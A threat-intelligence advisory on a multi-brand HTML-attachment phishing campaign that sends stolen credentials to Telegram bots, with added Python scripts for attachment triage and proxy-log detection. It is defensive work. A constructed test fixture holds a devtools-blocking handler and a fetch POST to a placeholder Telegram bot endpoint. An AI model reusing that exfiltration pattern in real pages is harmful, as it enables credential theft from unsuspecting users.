A sophisticated phishing campaign is actively targeting organizations across Central and Eastern Europe, leveraging specially crafted HTML attachments to steal user credentials through advanced social engineering tactics. This credential theft operation bypasses traditional security controls by embedding malicious JavaScript directly within HTML files, eliminating the need for external malicious links or remote command-and-control servers.
The phishing campaign impersonates trusted global brands including Adobe, Microsoft, FedEx, DocuSign, DHL, WeTransfer, and Telekom Deutschland to deceive victims into entering login credentials on convincing fake authentication pages. Stolen credentials are immediately exfiltrated to attacker-controlled Telegram bots, creating a fast, low-cost, and difficult-to-trace credential harvesting infrastructure.
This HTML-based phishing attack demonstrates significant evolution in cybercrime methodology, combining regional customization, realistic business communication lures, and anti-analysis techniques to breach even well-protected enterprise environments. The campaign has been assigned Threat Level Red with Admiralty Code A1, indicating highly reliable intelligence about an imminent and severe cybersecurity threat.
Targeted Industries: Agriculture & Livestock, Automotive, Construction, Consumer Goods, Education, Energy & Utilities, Government & Law Enforcement, Hospitality, IT & IT-Enabled Services, Manufacturing, Media & Entertainment, Professional Services, Retail, Telecommunications, Technology
Affected Regions: Czech Republic, Slovakia, Hungary, Germany, and broader Central and Eastern European territories
This credential theft campaign represents a departure from traditional phishing methodologies by delivering self-contained malicious HTML files via email attachments rather than relying on compromised websites or phishing URLs. The HTML attachments use RFC-compliant filenames or are compressed into ZIP archives to appear legitimate and bypass email security filters that typically flag suspicious file types.
When victims open these phishing attachments, they encounter a convincing counterfeit Adobe login interface prompting users to “sign in to view” an attached document. This social engineering tactic exploits the common business practice of sharing documents through cloud services, making the credential harvesting attempt appear routine and trustworthy.
The technical sophistication of this phishing campaign centers on its use of embedded JavaScript to capture and exfiltrate credentials entirely within the HTML file itself. This design choice enables the attack to show minimal external network activity until the moment credentials are transmitted to Telegram, significantly reducing detection opportunities for security monitoring tools.
Two distinct malware variants have been identified demonstrating evolving levels of technical refinement:
Sample 1 (Advanced Variant): Implements CryptoJS AES encryption to obfuscate malicious code, making static analysis more difficult. This variant captures not only usernames and passwords but also victim IP addresses and browser fingerprinting data through external APIs. The credential theft mechanism includes a deceptive “incorrect password” error message, prompting victims to re-enter credentials and ensuring data accuracy for attackers.
Sample 2 (Streamlined Variant): Uses the native JavaScript Fetch API for a more efficient credential exfiltration process. This variant integrates sophisticated anti-analysis techniques that actively block developer tools shortcuts (F12, Ctrl+Shift+I), preventing security-conscious users from inspecting the malicious JavaScript code embedded in the HTML phishing page.
Upon credential submission, victims unknowingly trigger a JavaScript-based POST request that sends their authentication data directly to the Telegram Bot API using hardcoded bot tokens and chat IDs. This exfiltration method offers attackers several operational advantages:
Analysis revealed a network of distinct Telegram bots, each employing unique tokens with different behavioral patterns, indicating either a coordinated threat actor group or a phishing-as-a-service model where multiple cybercriminals share common attack infrastructure.
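The two variants above leave static traces in the attachment itself: a Telegram Bot API URL with an embedded token, CryptoJS AES calls, a keydown handler that swallows F12 and Ctrl+Shift+I, an in-page POST, and the "sign in to view" lure text. The script below is an added example, not code from the advisory or from Cyble/HivePro, that triages an HTML attachment for those traces before it reaches a user. The indicator list, the scoring thresholds and both sample attachments are constructed for this example; the bot token in the sample is a placeholder, and the sample contains only the indicator strings, not a working phishing page.

```python
"""Static triage of an HTML email attachment for the campaign's indicators.

Added example; the indicators, thresholds and fixtures below are constructed
and not taken from the advisory.
"""
import hashlib
import re
from typing import Dict, List

# Indicators taken from the campaign description: Telegram Bot API exfiltration,
# CryptoJS/AES obfuscation, developer-tools key blocking, an in-page POST and
# the "sign in to view" lure wording. Patterns are assumptions for this example.
INDICATORS: Dict[str, re.Pattern] = {
    "telegram_bot_api": re.compile(
        r"api\.telegram\.org/bot[^/\"']+/(sendMessage|sendDocument)", re.I),
    "cryptojs_aes": re.compile(r"CryptoJS\.AES\.(encrypt|decrypt)", re.I),
    "devtools_block": re.compile(
        r"keyCode\s*===?\s*123|key\s*===?\s*['\"]F12['\"]|ctrlKey\s*&&\s*\w+\.shiftKey", re.I),
    "in_page_post": re.compile(
        r"method\s*:\s*['\"]POST['\"]|\.open\s*\(\s*['\"]POST['\"]", re.I),
    "sign_in_lure": re.compile(r"sign\s+in\s+to\s+view", re.I),
}

SCRIPT_RE = re.compile(r"<script\b[^>]*>([\s\S]*?)</script>", re.I)
ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")


def triage_html(data: bytes) -> dict:
    """Return indicator hits, a crude obfuscation heuristic and a verdict."""
    text = data.decode("utf-8", errors="replace")
    scripts: List[str] = SCRIPT_RE.findall(text)
    hits = sorted(name for name, pat in INDICATORS.items() if pat.search(text))

    # Obfuscation heuristic: a single very long script line or a flood of
    # \xNN / \uNNNN escapes. Thresholds are assumptions; tune on real samples.
    longest_line = max((len(l) for s in scripts for l in s.splitlines()), default=0)
    escapes = len(ESCAPE_RE.findall(text))
    obfuscated = longest_line > 2000 or escapes > 50

    if "telegram_bot_api" in hits:
        verdict = "block"            # bot-API exfil URL inside an attachment: no benign reading
    elif len(hits) >= 2 or (hits and obfuscated):
        verdict = "review"
    else:
        verdict = "allow"

    return {
        "sha256": hashlib.sha256(data).hexdigest(),  # for matching against published IoC hashes
        "script_blocks": len(scripts),
        "indicators": hits,
        "obfuscated": obfuscated,
        "verdict": verdict,
    }


# Constructed fixture: carries the indicator strings only, no working logic.
SAMPLE_ATTACHMENT = b"""<!DOCTYPE html>
<html><body>
<div class="modal">Sign in to view the shared document</div>
<form id="f"><input name="email"><input name="password" type="password"></form>
<script>
/* constructed fixture for the triage example */
document.addEventListener("keydown", function (e) {
  if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey)) { e.preventDefault(); }
});
var enc = CryptoJS.AES.encrypt("...", "k");
fetch("https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/sendMessage",
      { method: "POST" });
</script>
</body></html>
"""

# Constructed benign control: a plain HTML report with a harmless script.
BENIGN_ATTACHMENT = b"""<html><body><h1>Quarterly report</h1>
<script>document.title = "Report";</script></body></html>
"""

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(label, triage_html(blob))
```

The verdict logic treats a Telegram bot URL inside an attachment as decisive on its own, because no legitimate shared-document page posts to a bot endpoint; the other indicators are only combined, since a keydown handler or a POST alone is common in ordinary HTML. Run it from the email gateway's attachment hook or over a quarantine folder, and feed the returned SHA256 to the hash blocklist described in the indicators section.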
The phishing campaign demonstrates sophisticated localization strategies, adapting communication styles and branding to match regional business practices across Central and Eastern Europe. The threat actors meticulously replicate the visual identity of globally recognized brands, with many HTML templates sharing consistent design elements such as Adobe-styled authentication modals and blurred invoice backgrounds.
This visual consistency across multiple phishing samples suggests the probable use of an automated phishing generator toolkit or standardized template library, enabling rapid campaign scaling while maintaining credible brand impersonation. The attackers blend localized language with internationally recognized corporate identities, creating a scalable credential theft infrastructure designed for maximum reach and victim trust.
The phishing campaign’s success stems from several key evasion capabilities:
This combination creates a highly scalable, cost-effective credential theft operation that successfully evades traditional signature-based detection systems and URL filtering technologies commonly deployed in enterprise security architectures.
Be Cautious with HTML Attachments: Organizations should implement strict policies regarding HTML and ZIP attachments, especially those claiming to contain invoices, quotations, or shared documents. Security awareness training must emphasize that unexpected HTML attachments should be treated as suspicious until verified through trusted communication channels independent of email.
Verify Before You Click or Sign In: When any email requests credential entry to “sign in to view” a document, employees must confirm the request directly with the sender using a known email address or phone number from official company directories—never by replying to the suspicious email. Genuine companies rarely require authentication through attached files, making this a significant red flag for phishing attempts.
Restrict Telegram API Access: Given the widespread use of Telegram bots for credential exfiltration in this campaign, network administrators should evaluate blocking Telegram’s API endpoints at the firewall or proxy level where operationally feasible. In enterprise environments where Telegram has no legitimate business use case, preventing outbound connections to api.telegram.org can effectively disrupt this exfiltration channel.
Enable Multi-factor Authentication (MFA): Even when credentials are successfully stolen through phishing attacks, multi-factor authentication provides a critical secondary defense layer preventing unauthorized account access. Organizations must enforce MFA across all critical business systems, privileged accounts, and cloud services to minimize credential theft impact.
Enhance Endpoint Protection: Deploy next-generation antivirus (NGAV) solutions and endpoint detection and response (EDR) platforms capable of identifying malicious behavior rather than relying solely on signature-based detection. Leverage behavioral analysis engines and machine learning-based threat detection to identify suspicious JavaScript execution patterns and unusual data exfiltration attempts characteristic of this phishing campaign.
Organizations should prioritize security solutions that can analyze HTML file contents, detect obfuscated JavaScript, and identify anomalous network communications even when encrypted through legitimate services like Telegram.
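Blocking api.telegram.org at the proxy, as recommended above, also makes the proxy log the place to see who opened one of these attachments before the block was in force and who is still hitting the endpoint afterwards. The script below is an added example, not part of the advisory, that scans proxy log lines for Telegram Bot API requests and turns them into alerts with the bot token redacted. The space-separated log format, the workstation address range, the convention that status 403 means the proxy denied the request, and the sample lines are all constructed for this example; adapt the parser to your proxy's real format.

```python
"""Egress detection for Telegram Bot API traffic in proxy logs.

Added example. Log format, address range, 403-means-denied convention and
the sample lines are constructed assumptions, not taken from the advisory.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# Assumed: user workstations live in 10.20.0.0/16; servers elsewhere.
WORKSTATION_PREFIXES = ("10.20.",)

# Assumed log line: <timestamp> <client-ip> <method> <url> <status>
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})")
# Bot API URLs always carry the token in the path: /bot<id>:<secret>/<call>
BOT_URL_RE = re.compile(r"^https?://api\.telegram\.org/bot(?P<token>[^/]+)/(?P<call>\w+)")


@dataclass
class Alert:
    ts: str
    client: str
    method: str
    call: str
    token_hint: str        # redacted: the bot id is enough to correlate, the secret is not needed
    action: str            # "blocked" if the proxy denied it, else "allowed"
    from_workstation: bool


def redact_token(token: str) -> str:
    """Keep only the numeric bot id so analysts never copy the secret into tickets."""
    bot_id = token.split(":", 1)[0]
    return f"{bot_id}:***"


def analyse_line(line: str) -> Optional[Alert]:
    """Return an Alert for any request to a Telegram bot endpoint, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    b = BOT_URL_RE.match(m["url"])
    if not b:
        return None
    action = "blocked" if int(m["status"]) == 403 else "allowed"
    return Alert(
        ts=m["ts"], client=m["client"], method=m["method"], call=b["call"],
        token_hint=redact_token(b["token"]), action=action,
        from_workstation=m["client"].startswith(WORKSTATION_PREFIXES),
    )


def analyse_log(lines: Iterable[str]) -> List[Alert]:
    return [a for a in (analyse_line(l) for l in lines) if a is not None]


def clients_to_contain(alerts: List[Alert]) -> Set[str]:
    """Workstations whose POST to a bot endpoint got through: treat their credentials as exposed."""
    return {a.client for a in alerts
            if a.from_workstation and a.method == "POST" and a.action == "allowed"}


# Constructed sample log; tokens are placeholders.
SAMPLE_LOG = """\
2025-01-15T08:12:03Z 10.20.4.17 GET https://www.adobe.com/ 200
2025-01-15T08:12:09Z 10.20.4.17 POST https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/sendMessage 200
2025-01-15T08:13:41Z 10.20.7.3 POST https://api.telegram.org/bot111111111:PLACEHOLDER_TOKEN/sendMessage 403
2025-01-15T08:14:00Z 10.20.4.17 GET https://example.com/report.html 200
""".splitlines()

if __name__ == "__main__":
    found = analyse_log(SAMPLE_LOG)
    for a in found:
        print(a)
    print("contain:", clients_to_contain(found))
```

A blocked request is still worth an alert: it means the user reached the credential-entry step and very likely typed a password, so the account should be reset and MFA enforced even though nothing left the network. The redaction keeps the bot id, which is what you need to cluster attachments from the same kit across mailboxes, without putting the attacker's working token into a ticketing system.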
The following SHA256 file hashes represent confirmed malicious HTML phishing attachments associated with this credential theft campaign:
Organizations should integrate these file hash indicators into endpoint protection platforms, email security gateways, and threat intelligence feeds to enable automated detection and blocking of known malicious phishing attachments.
Note: Additional IoCs are available in the complete threat intelligence report on the HivePro platform.
This credential theft campaign maps to the following MITRE ATT&CK Tactics, Techniques, and Procedures (TTPs):
Security teams should leverage these MITRE ATT&CK mappings to validate detection capabilities, tune security monitoring rules, and assess organizational resilience against this specific phishing campaign methodology.
https://cyble.com/blog/multi-brand-phishing-campaign-harvests-credentials/